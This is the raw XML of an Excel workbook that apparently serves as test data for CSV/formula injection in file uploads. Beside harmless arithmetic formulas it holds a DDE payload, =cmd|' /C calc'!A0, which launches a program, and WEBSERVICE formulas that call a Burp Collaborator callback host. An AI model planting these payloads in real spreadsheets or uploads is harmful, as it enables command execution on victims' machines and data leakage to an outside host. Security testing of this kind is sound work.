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Space\test data\File Uploads\Formulae Injection Payloads\"/>
    </mc:Choice>
  </mc:AlternateContent>
  <xr:revisionPtr revIDLastSave="0" documentId="13_ncr:1_{F4C7E422-96EB-4643-B759-5ED5129BAB9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5" i="1"/>
  <c r="F4" i="1"/>
  <c r="F8" i="1" a="1"/>
  <c r="F8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<sst xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main" count="12" uniqueCount="11">
  <si>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=cmd|' /C calc'!A0</t>
  </si>
  <si>
    <t>=2+2</t>
  </si>
  <si>
    <t>Output</t>
  </si>
  <si>
    <t>Formula used</t>
  </si>
  <si>
    <t>-4+1</t>
  </si>
  <si>
    <t>=1+5</t>
  </si>
  <si>
    <t>=+WEBSERVICE("qe83plcm22kmlka5ow5ibzqpsgy6mv.burpcollaborator.net?Query+")</t>
  </si>
  <si>
    <t>=-WEBSERVICE("qe83plcm22kmlka5ow5ibzqpsgy6mv.burpcollaborator.net?Query-")</t>
  </si>
  <si>
    <t>=WEBSERVICE("qe83plcm22kmlka5ow5ibzqpsgy6mv.burpcollaborator.net?Query@")</t>
  </si>
  <si>
    <t>=WEBSERVICE("qe83plcm22kmlka5ow5ibzqpsgy6mv.burpcollaborator.net?Query=")</t>
  </si>
  <si>
    <t>Payload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</si>
</sst>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8" sqref="E8"/>
    </sheetView>
  </sheetViews>
  <sheetFormatPr defaultRowHeight="15" x14ac:dyDescent="0.25"/>
  <cols>
    <col min="5" max="5" width="78" bestFit="1" customWidth="1"/>
    <col min="6" max="6" width="53.28515625" bestFit="1" customWidth="1"/>
  </cols>
  <sheetData>
    <row r="1" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A1" s="1"/>
    </row>
    <row r="2" spans="1:6" x14ac:dyDescent="0.25">
      <c r="E2" s="2" t="s">
        <v>3</v>
      </c>
      <c r="F2" s="2" t="s">
        <v>2</v>
      </c>
    </row>
    <row r="3" spans="1:6" x14ac:dyDescent="0.25">
      <c r="E3" s="3" t="s">
        <v>1</v>
      </c>
      <c r="F3" s="4">
        <f>2+2</f>
        <v>4</v>
      </c>
    </row>
    <row r="4" spans="1:6" x14ac:dyDescent="0.25">
      <c r="E4" s="3" t="s">
        <v>4</v>
      </c>
      <c r="F4" s="4">
        <f>-4+1</f>
        <v>-3</v>
      </c>
    </row>
    <row r="5" spans="1:6" x14ac:dyDescent="0.25">
      <c r="E5" s="3" t="s">
        <v>5</v>
      </c>
      <c r="F5" s="4">
        <f>1+5</f>
        <v>6</v>
      </c>
    </row>
    <row r="6" spans="1:6" x14ac:dyDescent="0.25">
      <c r="E6" s="1"/>
    </row>
    <row r="7" spans="1:6" x14ac:dyDescent="0.25">
      <c r="E7" s="5" t="s">
        <v>10</v>
      </c>
      <c r="F7" s="2" t="s">
        <v>2</v>
      </c>
    </row>
    <row r="8" spans="1:6" x14ac:dyDescent="0.25">
      <c r="E8" s="3" t="s">
        <v>0</v>
      </c>
      <c r="F8" s="4" t="e" cm="1">
        <f t="array" ref="F8">[1]!A0</f>
        <v>#REF!</v>
      </c>
    </row>
    <row r="9" spans="1:6" x14ac:dyDescent="0.25">
      <c r="E9" s="3" t="s">
        <v>9</v>
      </c>
      <c r="F9" s="4" t="e">
        <f>_xlfn.WEBSERVICE("qe83plcm22kmlka5ow5ibzqpsgy6mv.burpcollaborator.net?Query=")</f>
        <v>#VALUE!</v>
      </c>
    </row>
    <row r="10" spans="1:6" x14ac:dyDescent="0.25">
      <c r="E10" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F10" s="4" t="e">
        <f>+_xlfn.WEBSERVICE("qe83plcm22kmlka5ow5ibzqpsgy6mv.burpcollaborator.net?Query+")</f>
        <v>#VALUE!</v>
      </c>
    </row>
    <row r="11" spans="1:6" x14ac:dyDescent="0.25">
      <c r="E11" s="3" t="s">
        <v>7</v>
      </c>
      <c r="F11" s="4" t="e">
        <f>-_xlfn.WEBSERVICE("qe83plcm22kmlka5ow5ibzqpsgy6mv.burpcollaborator.net?Query-")</f>
        <v>#VALUE!</v>
      </c>
    </row>
    <row r="12" spans="1:6" x14ac:dyDescent="0.25">
      <c r="E12" s="3" t="s">
        <v>8</v>
      </c>
      <c r="F12" s="4" t="e">
        <f>_xlfn.WEBSERVICE("qe83plcm22kmlka5ow5ibzqpsgy6mv.burpcollaborator.net?Query@")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Opensource</dc:creator>
  <cp:lastModifiedBy>Opensource</cp:lastModifiedBy>
  <dcterms:created xsi:type="dcterms:W3CDTF">2015-06-05T18:17:20Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2021-11-30T12:28:21Z</dcterms:modified>
</cp:coreProperties>
</file>